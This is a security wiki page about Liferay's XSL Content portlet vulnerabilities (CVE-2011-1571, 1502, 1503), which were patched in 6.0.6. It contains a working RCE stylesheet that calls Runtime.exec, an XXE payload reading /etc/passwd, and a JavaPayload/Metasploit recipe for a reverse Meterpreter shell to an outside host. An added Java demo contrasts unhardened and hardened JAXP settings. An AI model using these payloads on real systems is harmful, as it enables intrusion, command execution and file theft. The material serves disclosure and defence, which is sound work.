Wiki source code of Application_Liferay

Last modified by Nicolas Gregoire on 2012/04/19 14:05

{{toc/}}

= Introduction =

Quoting [[Wikipedia>>http://en.wikipedia.org/wiki/Liferay||rel="__blank"]]: //"Liferay Portal is a free and open source enterprise portal written in Java and distributed under the GNU Lesser General Public License and proprietary licenses. It is primarily used to power corporate intranets and extranets. [...] Liferay Portal is Java based and runs on any computing platform capable of running the Java Runtime Environment and an application server. Liferay is available bundled with a servlet container such as Apache Tomcat."//

The vulnerabilities described here were patched in version 6.0.6 GA (cf. the [[Release Notes for 6.0.6 GA>>http://issues.liferay.com/secure/ReleaseNote.jspa?version=10656&styleName=Html&projectId=10952||rel="__blank"]]).

= Java code execution =

Liferay ships numerous portlets. The "XSL Content" portlet displays the result of the XSL transformation of an XML document. The XSLT engine used by default is [[Xalan-J>>Engine_XalanJ]] (this can probably be swapped easily through [[JAXP>>http://en.wikipedia.org/wiki/Java_API_for_XML_Processing||rel="__blank"]]). Since Xalan-J, by default, lets a stylesheet call arbitrary Java methods through its Java extension functions, this is an easy-to-exploit vulnerability: any logged-in user can execute arbitrary Java code in the context of the web application server (usually Tomcat). This is [[CVE-2011-1571>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1571||rel="__blank"]].

Executing commands and reading their output (using the "xalanj-reading-stdout.xsl" stylesheet included on the [[Xalan-J>>Engine_XalanJ]] page):

[[image:liferay-execute-commands-with-stdout.png||style="display: block; margin-left: auto; margin-right: auto"]]

= Meterpreter shell =

As described in [[Feature #6594: Liferay XSL Command Execution>>http://dev.metasploit.com/redmine/issues/6594||rel="__blank"]], here is a way to obtain a Meterpreter shell through this vulnerability:

- the stand-alone JavaPayload builder to generate the XSLT stylesheet (java -jar JavaPayload.jar Builder Template XalanJ.xsl output.xsl ReverseTCP 1.2.3.4 31337 - - JSh)
- Metasploit to handle the incoming Meterpreter connection (PAYLOAD=java/meterpreter/reverse_tcp)
- manual interaction to trigger the vulnerability (browser)

= Additional vulnerabilities =

Two other vulnerabilities were identified in the "XSL Content" portlet:

* CVE-2011-1503: allows reading XML files via a file:~/~/ URL (not mine!)

* CVE-2011-1502: allows reading UTF-8 text files and listing directories via an XEE (XML External Entity, more commonly written XXE) attack

Reading /etc/passwd using CVE-2011-1502 (see the attached files [[liferay-xee.xsl>>attach:liferay-xee.xsl]] and [[liferay-xee.xml>>attach:liferay-xee.xml]]):

[[image:liferay-read-etc-passwd-via-xee.png||style="display: block; margin-left: auto; margin-right: auto"]]
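The following is an added example, not code from this page, from Liferay or from Xalan-J. It reproduces what the "XSL Content" portlet does (attacker-controlled XML and XSL pushed through Xalan-J) for both the Java extension-function call behind CVE-2011-1571 and the external-entity read behind CVE-2011-1502, and runs each input a second time through a hardened JAXP setup so the difference is visible. Assumptions: Xalan-J's interpretive processor (org.apache.xalan.processor.TransformerFactoryImpl, with xalan.jar and serializer.jar on the classpath), Java 8 or later, and constructed inline strings in place of the URLs the portlet fetches; the class, constant and method names are mine.

```java
import java.io.StringReader;
import java.io.StringWriter;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.transform.Source;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.dom.DOMSource;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;
import org.xml.sax.InputSource;

/*
 * Added example, not Liferay or Xalan-J code. Mimics the XSL Content portlet
 * (attacker-supplied XML + XSL through Xalan-J) with the inputs held as
 * constructed strings so it runs offline. Needs xalan.jar and serializer.jar
 * on the classpath; XALAN_FACTORY is Xalan-J's interpretive processor.
 */
public class XslContentDemo {

    static final String XALAN_FACTORY = "org.apache.xalan.processor.TransformerFactoryImpl";

    /* Constructed stylesheet for CVE-2011-1571: Xalan-J maps the namespace
     * http://xml.apache.org/xalan/java/<class> onto that Java class, so the
     * stylesheet calls Runtime.exec() and reads the first line of its stdout. */
    static final String RCE_XSL =
          "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\n"
        + "  xmlns:rt=\"http://xml.apache.org/xalan/java/java.lang.Runtime\"\n"
        + "  xmlns:pr=\"http://xml.apache.org/xalan/java/java.lang.Process\"\n"
        + "  xmlns:isr=\"http://xml.apache.org/xalan/java/java.io.InputStreamReader\"\n"
        + "  xmlns:br=\"http://xml.apache.org/xalan/java/java.io.BufferedReader\">\n"
        + "  <xsl:output method=\"text\"/>\n"
        + "  <xsl:template match=\"/\">\n"
        + "    <xsl:variable name=\"proc\" select=\"rt:exec(rt:getRuntime(), 'id')\"/>\n"
        + "    <xsl:variable name=\"reader\" select=\"br:new(isr:new(pr:getInputStream($proc)))\"/>\n"
        + "    <xsl:value-of select=\"br:readLine($reader)\"/>\n"
        + "  </xsl:template>\n"
        + "</xsl:stylesheet>";

    /* Constructed XML for CVE-2011-1502: an external general entity pulls a
     * local file into the document before the stylesheet ever sees it. */
    static final String XXE_XML =
          "<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>\n"
        + "<data>&xxe;</data>";

    /* Harmless stylesheet that echoes the document text, so the expanded entity shows in the output. */
    static final String ECHO_XSL =
          "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\n"
        + "  <xsl:output method=\"text\"/>\n"
        + "  <xsl:template match=\"/\"><xsl:value-of select=\"/data\"/></xsl:template>\n"
        + "</xsl:stylesheet>";

    static TransformerFactory factory(boolean hardened) throws TransformerException {
        TransformerFactory tf = TransformerFactory.newInstance(XALAN_FACTORY, null);
        if (hardened) {
            // JAXP secure processing: Xalan-J (2.7.1 and later) refuses extension
            // function calls, so the java: namespace trick fails at transform time.
            tf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
            // document(), xsl:include and xsl:import go through the URIResolver;
            // refusing everything stops the stylesheet from fetching local or remote files.
            tf.setURIResolver((href, base) -> {
                throw new TransformerException("external resource blocked: " + href);
            });
        }
        return tf;
    }

    static Source parseInput(String xml, boolean hardened) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        if (hardened) {
            // No DOCTYPE at all: no external entities, and no entity-expansion DoS either.
            dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        }
        return new DOMSource(dbf.newDocumentBuilder().parse(new InputSource(new StringReader(xml))));
    }

    static String transform(String xsl, String xml, boolean hardened) throws Exception {
        Transformer t = factory(hardened).newTransformer(new StreamSource(new StringReader(xsl)));
        StringWriter out = new StringWriter();
        t.transform(parseInput(xml, hardened), new StreamResult(out));
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        String[][] cases = { { "RCE", RCE_XSL, "<a/>" }, { "XXE", ECHO_XSL, XXE_XML } };
        for (String[] c : cases) {
            System.out.println(c[0] + ", unhardened: " + transform(c[1], c[2], false).split("\n")[0]);
            try {
                transform(c[1], c[2], true);
                System.out.println(c[0] + ", hardened: NOT blocked");
            } catch (Exception e) {
                System.out.println(c[0] + ", hardened: blocked (" + e.getMessage() + ")");
            }
        }
    }
}
```

Compile and run with xalan.jar and serializer.jar on the classpath (javac -cp xalan.jar XslContentDemo.java; java -cp .:xalan.jar:serializer.jar XslContentDemo). The unhardened pass prints the output of id and the first line of /etc/passwd; the hardened pass throws for both. Note that the three settings are independent: FEATURE_SECURE_PROCESSING only disables extension functions, the URIResolver only covers resources the stylesheet itself asks for, and only the parser feature stops the DOCTYPE in the source document, so all three are needed to close both issues.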